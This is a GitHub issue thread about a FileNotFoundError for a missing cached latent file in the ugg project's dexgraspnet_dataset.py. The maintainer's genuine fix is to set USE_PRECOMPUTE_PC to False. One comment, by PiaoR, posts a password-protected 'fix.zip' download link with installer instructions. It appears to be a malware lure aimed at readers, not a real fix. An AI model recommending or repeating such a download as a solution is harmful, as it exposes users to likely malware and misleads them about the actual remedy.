### ISSUE TITLE
Missing cached latent files for dexgraspnet_dataset.py

### ISSUE THREAD

**Issue by jianglongye** [Jiaxin-Lu/ugg#1]
Thank you for your excellent work. However, when running the command `python model/ugg/hand_vae.py --cfg experiments/ugg_hand_vae_train.yaml`, we encountered an issue at line 154 of `dexgraspnet_dataset.py`. The error message is as follows:

```
FileNotFoundError: [Errno 2] No such file or directory: 'data/meshdata/core-bottle-10dff3c43200a7a7119862dbccbaa609/coacd/pc_norm_latent_LION_006.pk'
```

It appears that the cached latent file mentioned in the error needs to be generated in advance. However, we couldn't find any instructions on how to generate this file. Any guidance on this matter would be greatly appreciated.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jiaxin-Lu** [comment]
Try to set `USE_PRECOMPUTE_PC: True` to `False` in the config file.

**Comment by jianglongye** [comment]
thx, that resolves the issue

**Comment by huamo555** [comment]
> Thank you for your excellent work. However, when running the command `python model/ugg/hand_vae.py --cfg experiments/ugg_hand_vae_train.yaml`, we encountered an issue at line 154 of `dexgraspnet_dataset.py`. The error message is as follows:
> 
> ```
> FileNotFoundError: [Errno 2] No such file or directory: 'data/meshdata/core-bottle-10dff3c43200a7a7119862dbccbaa609/coacd/pc_norm_latent_LION_006.pk'
> ```
> 
> It appears that the cached latent file mentioned in the error needs to be generated in advance. However, we couldn't find any instructions on how to generate this file. Any guidance on this matter would be greatly appreciated.

May I ask if you have reproduced the results of the paper?
